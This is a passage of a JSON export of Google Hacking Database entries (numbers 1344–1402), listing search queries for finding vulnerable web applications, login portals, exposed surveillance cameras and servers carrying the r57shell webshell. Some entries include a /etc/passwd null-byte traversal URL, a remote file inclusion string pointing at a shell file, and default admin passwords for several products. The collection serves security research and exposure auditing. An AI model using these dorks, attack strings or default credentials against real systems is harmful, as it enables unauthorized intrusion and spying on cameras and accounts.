"signatureReferenceNumber": "1344", "link": "https://www.exploit-db.com/ghdb/1344/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Unable+to+jump+to+row%22+%22on+MySQL+result+index%22+%22on+line%22&num=100&hl=en&lr=&start=0&sa=N", "shortDescription": "\"Unable to jump to row\" \"on MySQL result index\" \"on line\"", "textualDescription": "another error message" }, { "signatureReferenceNumber": "1345", "link": "https://www.exploit-db.com/ghdb/1345/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22This+script+was+created+by+Php-ZeroNet%22+%22Script+.+Php-ZeroNet%22+&btnG=Search", "shortDescription": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "textualDescription": "Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps" }, { "signatureReferenceNumber": "1346", "link": "https://www.exploit-db.com/ghdb/1346/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=phpsurveyor+%22%5BExit+and+Clear+Survey%5D%22&btnG=H%C4%BEada%C5%A5&meta=", "shortDescription": "\"You have not provided a survey identification number\" ERROR -xoops.org \"please contact\"", "textualDescription": "sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html" }, { "signatureReferenceNumber": "1347", "link": "https://www.exploit-db.com/ghdb/1347/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=intitle%3A%22HelpDesk%22+%22If+you+need+additional+help%2C+please+email+helpdesk+at%22&btnG=H%C4%BEada%C5%A5&meta=", "shortDescription": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "textualDescription": "it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps" }, { "signatureReferenceNumber": "1348", "link": "https://www.exploit-db.com/ghdb/1348/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Adatabase.php+%7C+inurl%3Ainfo_db.php+ext%3Aphp+%22Database+V2.*%22+%22Burning+Board+*%22", "shortDescription": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "textualDescription": "this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html" }, { "signatureReferenceNumber": "1349", "link": "https://www.exploit-db.com/ghdb/1349/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22php121login.php%22&btnG=Search", "shortDescription": "inurl:\"php121login.php\"", "textualDescription": "\"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!\"" }, { "signatureReferenceNumber": "1350", "link": "https://www.exploit-db.com/ghdb/1350/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22The+statistics+were+last+updated%22+%22Daily%22-microsoft.com&btnG=Search", "shortDescription": "\"The statistics were last updated\" \"Daily\"-microsoft.com", "textualDescription": "Results include many varius Network activity logs" }, { "signatureReferenceNumber": "1351", "link": "https://www.exploit-db.com/ghdb/1351/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Employee+Intranet+Login%22&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"Employee Intranet Login\"", "textualDescription": "Intranet login pages by decentrix.com" }, { "signatureReferenceNumber": "1352", "link": "https://www.exploit-db.com/ghdb/1352/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Uploader+-+Uploader+v6%22+-pixloads.com&btnG=Search", "shortDescription": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "textualDescription": "File upload servers, dangerous if used in couple with mytrashmail.com" }, { "signatureReferenceNumber": "1353", "link": "https://www.exploit-db.com/ghdb/1353/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22%2Fslxweb.dll%2Fexternal%3Fname%3D%28custportal%7Cwebticketcust%29%22&btnG=Search", "shortDescription": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "textualDescription": "Customer login pages\"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.\"" }, { "signatureReferenceNumber": "1354", "link": "https://www.exploit-db.com/ghdb/1354/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22Please+login+-+Forums+powered+by+WWWThreads%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.php%22%29%7C%28inurl%3A%22wwwthreads%2Flogin.pl%3FCat%3D%22%29&btnG=Search", "shortDescription": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "textualDescription": "\"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.\"" }, { "signatureReferenceNumber": "1355", "link": "https://www.exploit-db.com/ghdb/1355/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Apache+Status%22+%22Apache+Server+Status+for%22&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"Apache Status\" \"Apache Server Status for\"", "textualDescription": "New Apache Server Status Dork" }, { "signatureReferenceNumber": "1356", "link": "https://www.exploit-db.com/ghdb/1356/", "category": "Pages containing login portals", "querystring": "http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3655", "shortDescription": "(intitle:\"rymo Login\")|(intext:\"Welcome to rymo\") -family", "textualDescription": "\"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.\"" }, { "signatureReferenceNumber": "1357", "link": "https://www.exploit-db.com/ghdb/1357/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%28%22TrackerCam+Live+Video%22%29%7C%28%22TrackerCam+Application+Login%22%29%7C%28%22Trackercam+Remote%22%29+-trackercam.com&btnG=Search", "shortDescription": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "textualDescription": "\"TrackerCam\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.\"" }, { "signatureReferenceNumber": "1358", "link": "https://www.exploit-db.com/ghdb/1358/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22SquirrelMail+version%22+%22By+the+SquirrelMail+Development+Team%22&btnG=Search", "shortDescription": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "textualDescription": "More SquirrelMail Logins" }, { "signatureReferenceNumber": "1359", "link": "https://www.exploit-db.com/ghdb/1359/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22TWIG%20Login%22", "shortDescription": "intitle:\"TWIG Login\"", "textualDescription": "\"TWIG is a Web-based groupware suite written in PHP, compatible with both PHP3 and PHP4. Its features include IMAP and POP3 email, Usenet newsgroups, contact management, scheduling, shared notes and bookmarks, a todo list, and meeting announcements.\"" }, { "signatureReferenceNumber": "1360", "link": "https://www.exploit-db.com/ghdb/1360/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3AIMP+inurl%3Aimp%2Findex.php3&btnG=Search", "shortDescription": "intitle:IMP inurl:imp/index.php3", "textualDescription": "Webmail Login pages for IMP\"IMP is a set of PHP scripts that implement an IMAP based webmail system. Assuming you have an account on a server that supports IMAP, you can use an installation of IMP to check your mail from anywhere that you have web access.\"" }, { "signatureReferenceNumber": "1361", "link": "https://www.exploit-db.com/ghdb/1361/", "category": "Footholds", "querystring": "http://www.google.com/search?q=(intitle:%22SHOUTcast+Administrator%22)%7C(intext:%22U+SHOUTcast+D.N.A.S.+Status%22)&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "(intitle:\"SHOUTcast Administrator\")|(intext:\"U SHOUTcast D.N.A.S. Status\")", "textualDescription": "sHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts." }, { "signatureReferenceNumber": "1362", "link": "https://www.exploit-db.com/ghdb/1362/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22SHOUTcast+Administrator%22+inurl%3Aadmin.cgi&btnG=Search", "shortDescription": "intitle:\"SHOUTcast Administrator\" inurl:admin.cgi", "textualDescription": "Login pages for SHOUTcast\"SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. \"" }, { "signatureReferenceNumber": "1363", "link": "https://www.exploit-db.com/ghdb/1363/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3A%22Target+Multicast+Group%22+%22beacon%22&btnG=Search", "shortDescription": "intext:\"Target Multicast Group\" \"beacon\"", "textualDescription": "\"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.\"see h**p://beacon.dast.nlanr.net" }, { "signatureReferenceNumber": "1364", "link": "https://www.exploit-db.com/ghdb/1364/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=(intitle:%22Please+login+-+Forums+powered+by+UBB.threads%22)%7C(inurl:login.php+%22ubb%22)&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "textualDescription": "Logins for Forums powered by UBB.threads" }, { "signatureReferenceNumber": "1365", "link": "https://www.exploit-db.com/ghdb/1365/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Device+Status+Summary+Page%22+-demo&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"Device Status Summary Page\" -demo", "textualDescription": "hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... wooIncludes:Temperature (\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00b0F)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:" }, { "signatureReferenceNumber": "1366", "link": "https://www.exploit-db.com/ghdb/1366/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=(intitle:%22WmSC+e-Cart+Administration%22)%7C(intitle:%22WebMyStyle+e-Cart+Administration%22)&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "(intitle:\"WmSC e-Cart Administration\")|(intitle:\"WebMyStyle e-Cart Administration\")", "textualDescription": "Login Pages for WebMyStyle.\"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites.\"" }, { "signatureReferenceNumber": "1367", "link": "https://www.exploit-db.com/ghdb/1367/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22eXist+Database+Administration%22+-demo&btnG=Search", "shortDescription": "intitle:\"eXist Database Administration\" -demo", "textualDescription": "Login Pages \"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.\"" }, { "signatureReferenceNumber": "1368", "link": "https://www.exploit-db.com/ghdb/1368/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle%3A%22Apache+Tomcat%22+%22Error+Report%22", "shortDescription": "intitle:\"Apache Tomcat\" \"Error Report\"", "textualDescription": "Apache Tomcat Error messages. These can reveal various kinds information depending on the type of error." }, { "signatureReferenceNumber": "1369", "link": "https://www.exploit-db.com/ghdb/1369/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22This+site+is+using+phpGraphy%22+%7C+intitle%3A%22my+phpgraphy+site%22+&btnG=Cerca+con+Google&meta=&num=100&filter=1", "shortDescription": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "textualDescription": "found this: a remote user can have access to some edit functionalities to \"modify\" html. Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705" }, { "signatureReferenceNumber": "1370", "link": "https://www.exploit-db.com/ghdb/1370/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&q=intext%3A%22Powered+by+PCPIN.com%22+-site%3Apcpin.com+-ihackstuff+-%22works+with%22+-findlaw&lr=&filter=0", "shortDescription": "intext:\"Powered by PCPIN.com\" -site:pcpin.com -ihackstuff -\"works with\" -findlaw", "textualDescription": "this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/" }, { "signatureReferenceNumber": "1371", "link": "https://www.exploit-db.com/ghdb/1371/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&q=intitle%3Ar57shell+%2Buname+-bbpress+-ihackstuff&btnG=Search", "shortDescription": "intitle:r57shell +uname -bbpress", "textualDescription": "compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team" }, { "signatureReferenceNumber": "1372", "link": "https://www.exploit-db.com/ghdb/1372/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22iGuard+Fingerprint+Security+System%22+-ihackstuff", "shortDescription": "intitle:\"iGuard Fingerprint Security System\"", "textualDescription": "vendor:http://www.iguardus.com/dome information disclosure: employeers list & free camera access" }, { "signatureReferenceNumber": "1373", "link": "https://www.exploit-db.com/ghdb/1373/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Veo+Observer+XT%22+-inurl%3Ashtml%7Cpl%7Cphp%7Chtm%7Casp%7Caspx%7Cpdf%7Ccfm+-intext%3Aobserver&num=100", "shortDescription": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "textualDescription": "just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1348" }, { "signatureReferenceNumber": "1374", "link": "https://www.exploit-db.com/ghdb/1374/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=%28intitle%3A%28EyeSpyFX%7COptiCamFX%29+%22go+to+camera%22%29%7C%28inurl%3Aservlet%2FDetectBrowser%29&num=100", "shortDescription": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "textualDescription": "just more cameras vendor site: http://www.eyespyfx.com/" }, { "signatureReferenceNumber": "1375", "link": "https://www.exploit-db.com/ghdb/1375/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=intitle%3A%22X7+Chat+Help+Center%22+%7C+%22Powered+By+X7+Chat%22+-milw0rm+-exploit&filter=0", "shortDescription": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "textualDescription": "this is for X7 Chat" }, { "signatureReferenceNumber": "1376", "link": "https://www.exploit-db.com/ghdb/1376/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:cgi-bin/guestimage.html&hl=en&lr=&start=0&sa=N&num=100&filter=0", "shortDescription": "inurl:cgi-bin/guestimage.html", "textualDescription": "just more more MOBOTIX's" }, { "signatureReferenceNumber": "1377", "link": "https://www.exploit-db.com/ghdb/1377/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?sourceid=navclient-ff&ie=UTF-8&rls=GGGL,GGGL:2005-09,GGGL:en&q=allinurl%3Atseekdir.cgi", "shortDescription": "allinurl:tseekdir.cgi", "textualDescription": "tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html" }, { "signatureReferenceNumber": "1378", "link": "https://www.exploit-db.com/ghdb/1378/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22BadBlue%3A+the+file-sharing+web+server+anyone+can+use%22", "shortDescription": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "textualDescription": "Badblue file sharing web server detection" }, { "signatureReferenceNumber": "1379", "link": "https://www.exploit-db.com/ghdb/1379/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=Copyright+.+Nucleus+CMS+v3.22+.+Valid+XHTML+1.0+Strict+.+Valid+CSS+.+Back+to+top+-demo+-%22deadly+eyes%22&num=100&filter=1", "shortDescription": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "textualDescription": "this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html" }, { "signatureReferenceNumber": "1380", "link": "https://www.exploit-db.com/ghdb/1380/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+pppblog+v+0.3.(.)%22&num=100&hl=en&lr=&start=200&sa=N&filter=0", "shortDescription": "\"powered by pppblog v 0.3.(.)\"", "textualDescription": "this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html" }, { "signatureReferenceNumber": "1381", "link": "https://www.exploit-db.com/ghdb/1381/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+PHP-Fusion+v6.00.110%22+%7C+%22Powered+by+PHP-Fusion+v6.00.2..%22+%7C+%22Powered+by+PHP-Fusion+v6.00.3..%22+-v6.00.400+-johnny.ihackstuff&meta=&num=100&filter=0", "shortDescription": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "textualDescription": "this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html" }, { "signatureReferenceNumber": "1382", "link": "https://www.exploit-db.com/ghdb/1382/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22XOOPS+Site%22+intitle:%22Just+Use+it!%22+%7C+%22powered+by+xoops+(2.0)%7C(2.0.....)%22&num=100&hl=en&lr=&filter=0", "shortDescription": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "textualDescription": "this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory & poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html" }, { "signatureReferenceNumber": "1383", "link": "https://www.exploit-db.com/ghdb/1383/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Awp-login.php+%2BRegister+Username+Password+%22remember+me%22+-echo+-trac+-footwear&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "inurl:wp-login.php +Register Username Password \"remember me\" -echo -trac -footwear", "textualDescription": "this is a bit different from the previous one in GHDB, it searches for Wordpress 2.x sites where user registration is enabled, a user can inject a carriage return and php code inside cache files to have a shell on target systemadvisory & poc exploit here: http://retrogod.altervista.org/wordpress_202_xpl.html" }, { "signatureReferenceNumber": "1384", "link": "https://www.exploit-db.com/ghdb/1384/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+ubbthreads%22&hl=en&lr=&start=0&sa=N", "shortDescription": "\"powered by ubbthreads\"", "textualDescription": "forums powered by ubbthreads are vulnerable to file inclusion.You can get more results with yahoo search.http://site.com/ubbthredspath//ubbt.inc.php?thispath=http://shell.txt?http://www.securityfocus.com/archive/1/archive/1/435288/100/0/threaded" }, { "signatureReferenceNumber": "1385", "link": "https://www.exploit-db.com/ghdb/1385/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&q=intitle%3A%22SNC-RZ30+HOME%22+-demo", "shortDescription": "intitle:\"SNC-RZ30 HOME\" -demo", "textualDescription": "This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quite a few of these cameras have not been configured to deny you control. These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results.SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1 SNC-Z20" }, { "signatureReferenceNumber": "1386", "link": "https://www.exploit-db.com/ghdb/1386/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:+EverFocus+%7C+EDSR+%7C+EDSR400+Applet&num=100&&filter=0", "shortDescription": "allintitle: EverFocus | EDSR | EDSR400 Applet", "textualDescription": "Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query." }, { "signatureReferenceNumber": "1387", "link": "https://www.exploit-db.com/ghdb/1387/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=allintitle%3AEdr1680+remote+viewer&btnG=Google+Search", "shortDescription": "allintitle:Edr1680 remote viewer", "textualDescription": "Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake." }, { "signatureReferenceNumber": "1388", "link": "https://www.exploit-db.com/ghdb/1388/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:++EDR1600+login+%7C+Welcome&lr=&filter=0", "shortDescription": "allintitle: EDR1600 login | Welcome", "textualDescription": "Everfocus EDR1600" }, { "signatureReferenceNumber": "1389", "link": "https://www.exploit-db.com/ghdb/1389/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:++EDR400+login+%7C+Welcome&lr=&filter=0", "shortDescription": "allintitle: EDR400 login | Welcome", "textualDescription": "Everfocus EDR400" }, { "signatureReferenceNumber": "1390", "link": "https://www.exploit-db.com/ghdb/1390/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?hl=en&q=FlashChat+v4.5.7&meta=", "shortDescription": "FlashChat v4.5.7", "textualDescription": "This simple search brings up lots of online Flash Chat clients. Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is \"adminpass\" (Without the speech marks)." }, { "signatureReferenceNumber": "1391", "link": "https://www.exploit-db.com/ghdb/1391/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Divar+Web+Client%22", "shortDescription": "intitle:\"Divar Web Client\"", "textualDescription": "Boshe/Divar Net Cameras. Uses ActiveX - IE only." }, { "signatureReferenceNumber": "1392", "link": "https://www.exploit-db.com/ghdb/1392/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Live+View+/+-+AXIS%22+%7C+inurl:view/view.shtml+OR+inurl:view/indexFrame.shtml+%7C+intitle:%22MJPG+Live+Demo%22+%7C++%22intext:Select+preset+position%22&num=100&filter=0", "shortDescription": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" | \"intext:Select preset position\"", "textualDescription": "No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows." }, { "signatureReferenceNumber": "1393", "link": "https://www.exploit-db.com/ghdb/1393/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:+Axis+2.10+OR+2.12+OR+2.30+OR+2.31+OR+2.32+OR+2.33+OR+2.34+OR+2.40+OR+2.42+OR+2.43+%22Network+Camera+%22&num=100&filter=0", "shortDescription": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "textualDescription": "No one search will reveal all Axis cameras. This is a variant for the 2xxx series." }, { "signatureReferenceNumber": "1394", "link": "https://www.exploit-db.com/ghdb/1394/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22BlueNet+Video+Viewer%22&filter=0", "shortDescription": "intitle:\"BlueNet Video Viewer\"", "textualDescription": "Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. Uses ActiveX." }, { "signatureReferenceNumber": "1395", "link": "https://www.exploit-db.com/ghdb/1395/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&&q=intitle%3A%22stingray+fts+login%22+%7C+%28+login.jsp+intitle%3AStingRay+%29", "shortDescription": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "textualDescription": "The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now." }, { "signatureReferenceNumber": "1396", "link": "https://www.exploit-db.com/ghdb/1396/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:Ampache+intitle:%22love+of+music%22++password+%7C+login+%7C+%22Remember+Me.%22+-welcome&num=100&filter=0", "shortDescription": "intitle:Ampache intitle:\"love of music\" password | login | \"Remember Me.\" -welcome", "textualDescription": "Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC." }, { "signatureReferenceNumber": "1397", "link": "https://www.exploit-db.com/ghdb/1397/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle:%22DVR+login%22&num=100&filter=0", "shortDescription": "allintitle:\"DVR login\"", "textualDescription": "softwell Technology \"Wit-Eye\" DVR.Default user/pass is admin:adminRequires ActiveX" }, { "signatureReferenceNumber": "1398", "link": "https://www.exploit-db.com/ghdb/1398/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=intitle%3Aindex.of.config", "shortDescription": "intitle:index.of.config", "textualDescription": "These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. It can also contain information on various ports, security permisions..etc." }, { "signatureReferenceNumber": "1399", "link": "https://www.exploit-db.com/ghdb/1399/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=site%3Aextremetracking.com+inurl%3A%22login%3D%22+", "shortDescription": "site:extremetracking.com inurl:\"login=\"", "textualDescription": "The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses." }, { "signatureReferenceNumber": "1400", "link": "https://www.exploit-db.com/ghdb/1400/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22SurgeMAIL%22+inurl:/cgi/user.cgi+ext:cgi&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "textualDescription": "surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins." }, { "signatureReferenceNumber": "1401", "link": "https://www.exploit-db.com/ghdb/1401/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&num=100&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official_s&filter=0", "shortDescription": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "textualDescription": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url." }, { "signatureReferenceNumber": "1402", "link": "https://www.exploit-db.com/ghdb/1402/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28", "shortDescription": "(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(in", "textualDescription": "silkyMail is a free internet email client, from 